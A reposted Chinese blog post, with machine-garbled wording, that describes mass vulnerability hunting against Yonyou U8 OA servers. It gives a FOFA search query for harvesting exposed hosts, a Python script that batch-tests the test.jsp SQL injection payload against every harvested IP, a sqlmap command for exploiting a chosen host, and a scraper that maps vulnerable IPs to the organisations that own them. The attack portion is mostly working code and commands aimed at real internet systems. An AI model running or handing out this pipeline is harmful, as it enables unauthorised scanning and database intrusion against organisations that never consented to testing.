首页 » 网站推广 » php批量判空技巧_一条Fofa搜索语法实现批量挖洞

php批量判空技巧_一条Fofa搜索语法实现批量挖洞

访客 2024-11-14 0

扫一扫用手机浏览

文章目录 [+]

可免费领取10余本电子书+渗透工具包

作者:Jerrytqq

php批量判空技巧_一条Fofa搜索语法实现批量挖洞

转自:http://33h.co/23tf9

php批量判空技巧_一条Fofa搜索语法实现批量挖洞
(图片来自网络侵删)

任何非授权的渗透测试都是违法的、点到为止!

序言

最近在学习如何批量验证POC,期间也参考了不少文章,于是萌生了整合出一个自动化批量挖洞的想法。

终极实现效果为:仅通过一条Fofa搜索语法,就可以挖出可供提交公益SRC的漏洞

流程包括:

1、前期的信息网络(FOFA)2、中期的漏洞验证(Python批量脚本)3、后期的IP反查(Python批量脚本)

本次采取"用友 U8 OA SQL注入漏洞"来演示全体自动化流程。

这个漏洞的POC很大略,这里直接附上,详情须要的话网上有很多。

POC:http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))

信息网络

众所周知,信息网络是渗透测试中最关键的环节。

信息网络阶段我们的紧张目标是:

1、找到网上公开的漏洞POC

2、找出可能存在该漏洞的IP列表

这里我先推举2个我常常逛的漏洞文库。

白阁文库(http://33h.co/23tta)

PeiQi WiKi-POC文库(http://wiki.peiqi.tech/)

文章后续的POC也参考了文库中的信息。

正文开始

本次采取Fofa搜索引擎来网络可能存在漏洞的IP。

Fofa语句:title="用友U8-OA"

考虑到后续须要把Fofa网络到的IP列表导出给脚本批量验证,这里利用Github开源工具Fofa-collect(https://github.com/tangxiaofeng7/Fofa-collect/releases)

这个工具利用办法很大略,只须要配置好你的Fofa邮箱和API,就可以直接输入Fofa语法,得到查询结果。

我的利用流程如下:

1、在Fofa-collect中输入Fofa语法 -> 得到IP:PORT列表

2、导出保存为IP.txt

至此,信息网络流程结束。

POC批量验证

POC批量验证阶段我们的紧张目标是:

1、编写或利用POC,找出IP列表中真正存在漏洞的IP

POC批量验证的脚本在PeiQi文库的POC根本上进一步改写,支持批量导入IP.txt,并导出存在漏洞的URL,保存为urls.txt。

原POC链接:(http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html)

import requestsimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningip = [] # 用于存放存在漏洞的URL地址def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') print('+ \033[34m"大众号 : PeiQi文库 \033[0m') print('+ \033[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') print('+ \033[36m利用格式: python3 poc.py \033[0m') print('+ \033[36mFile >>> ip.txt \033[0m') print('+------------------------------------------')def POC_1(target_url) -> bool: vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) # 漏洞验证成功的条件 if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: print("\033[32m[o] 目标 {}存在漏洞 \n[o] 相应地址: {} \033[0m".format(target_url, vuln_url)) ip.append(vuln_url) else: print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) except Exception as e: print("\033[31m[x] 目标 {} 要求失落败 \033[0m".format(target_url))if __name__ == '__main__': title() with open('ip.txt', 'r', encoding='utf-8') as f: g = f.read() a = re.findall('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d+', g) # 提取为IP:PORT的形式 # 逐个验证IP.txt for i in a: if 'http' in i: target_url = str(i) else: target_url = 'http://' + str(i) print(target_url) core_name = POC_1(target_url) # 将存在漏洞的URL写入url.txt with open("urls.txt", "w") as f: for i in ip: if i != '': f.write(i + "\n") print(ip) # 终极打印所有存在漏洞的IP

可以看到运行结果中有存在漏洞的URL,并且已经存入了urls.txt

我们随便挑选一个URL,用sqlmap跑一下

python sqlmap.py -u "http://IP:PORT/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" -p "S1"

可以看到是存在注入点的(再次强调渗透测试点到为止,提交漏洞只须要跑出数据库名证明漏洞存在,信息安全三要素CIA时候铭记于心hhh)

实在文章到这里为止,就可以证明漏洞存在了,但是根据我在漏洞盒子刷公益SRC的履历来看

SRC漏洞需明确归属单位,只有ip或是非明确单位的域名暂不收录

以是光有IP还不足,须要我们去把这些存在漏洞的IP,通过IP反查域名,找出域名,再找出域名所属的单位,这样才能算得上是一个可以提交的漏洞。

(例如你挖出 IP地址 39.156.69.79存在漏洞,但是这样的漏洞一样平常不收,你须要去查出这个IP 39.156.69.79对应的域名是baidu.com,而baidu.com背后的单位是百度公司,将IP、域名、公司名称这些信息一并提交才行)

于是就有了下一个模块,批量IP反查。

批量IP反查域名

这个阶段我们的紧张目标是:

1、已知urls.txt中的IP存在漏洞,找出这些IP对应的域名,并找到域名所属单位

要想批量IP反查域名,找到一个得当的接口是首先要考虑的问题,

下面我列出几个可以IP反查域名的网站:

https://dns.aizhan.com/=https://www.yougetsignal.com/tools/web-sites-on-web-server/https://tools.ipip.net/ipdomain.php?ip=

这里我选择了利用第一个接口https://dns.aizhan.com/=

这部分的代码完备由我自己编写。
通过Python措辞,利用requests包仿照浏览器要求,BeautifulSoup包来提取页面内容,终极得到IP对应的域名。

#!/usr/bin/python# -- coding: UTF-8 --# @date: 2021/5/16 20:02# @name: ip反查域名# @author:h2o0o4'''须要把稳的问题:有时候没有一个IP能反查出域名,可能是由于你的IP被网站ban了,而不是查不出来,试着挂个代理这个接口有时候会由于你的频繁访问而谢绝做事,但是有时候是可以跑出结果的。
'''import reimport requestsfrom bs4 import BeautifulSoupfrom urllib3.exceptions import InsecureRequestWarninglist = [] # 用于存放可以通过IP反查到域名的域名def searchIP(ip: str): ip = re.findall('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}', ip)[0] print("IP:{}".format(ip)) url = "https://dns.aizhan.com/" + ip + "/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", } try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=url, headers=headers, verify=False, timeout=5) # title = re.findall("charset=utf-8;<span>(.?)</span>", response.text)[0] # print(response.text) soup = BeautifulSoup(response.text, "html.parser") for t in soup.find_all('td'): a = t.find_all('a') if a: for j in range(len(a)): url = a[j].attrs['href'] print(ip+"反查出的URL:"+url) list.append(ip+":"+url) except: print("\033[31m[x] 要求缺点 \033[0m")if __name__ == '__main__': with open('urls.txt', 'r', encoding='utf-8') as f: for line in f: searchIP(line)# 写入文件with open("result.txt", "w") as f: for i in list: if i != '': f.write(i + "\n")

运行完成后,可以看到result.txt中涌现了一些IP对应的域名

这时候我们只须要去访问域名,就可以知道这个IP对应的公司。

于是我们就可以拿着这些信息去提交漏洞了!

至此,全体流程结束。

可以看到我们通过 一条Fofa语句 和 一个POC ,就可以在短韶光内快速找到可以提交公益SRC的漏洞

在拿到新的POC时,仅需更换POC_1()函数,代码稍加改动,就可以实现另一个漏洞的批量挖掘。

总结

比较遗憾的地方

这个文章里用的POC是我在PeiQi文库供应的POC根本上改的,以是说并不是原创,

但是这也是一个学习的过程,多看看别人的,逐步的自己就也能上手写了,这也标志这我正在从一个脚本小子变成代码大师(开玩笑)。

为什么不用现有的POC批量工具?

我有理解到POC-T是一个很棒的POC批量验证工具,同时goby里也支持json格式导入POC验证模块,这些都是非常高效且便利的。

不过我认为我的学习韶光还长,要只管即便从根本学起,这就须要动手写写代码,理解那些工具底层用的什么逻辑。

可能在一些大佬眼里,我这个小项目便是一个缝合怪,不过我认为这是我学习的一个记录,还希望口下留情。

参考文章

http://wiki.peiqi.tech/PeiQi_Wiki/OA产品漏洞/用友OA/用友%20U8%20OA%20test.jsp%20SQL注入漏洞.htmlhttps://bbs.zkaq.cn/t/5320.html

本项目源码

https://github.com/h2so0o4/Fuck_SRC

标签:

相关文章

今日头条算法引领个化信息时代的变革

信息爆炸时代已经到来。每个人都是信息的接收者和传播者。面对海量的信息,人们往往感到无所适从。为了解决这一问题,各大互联网公司纷纷推...

网站推广 2025-01-31 阅读1 评论0

今日头条算法信息推荐的秘密武器

信息爆炸的时代已经来临。人们每天都会接触到大量的信息,而如何从这些信息中筛选出有价值的内容,成为了亟待解决的问题。今日头条算法作为...

网站推广 2025-01-31 阅读1 评论0

今日头条算法精准推荐背后的技术奥秘

信息爆炸的时代已经来临。我们每天都要面对海量的信息,如何从这些信息中筛选出自己感兴趣的内容,成为了每个人都关心的问题。今日头条作为...

网站推广 2025-01-31 阅读1 评论0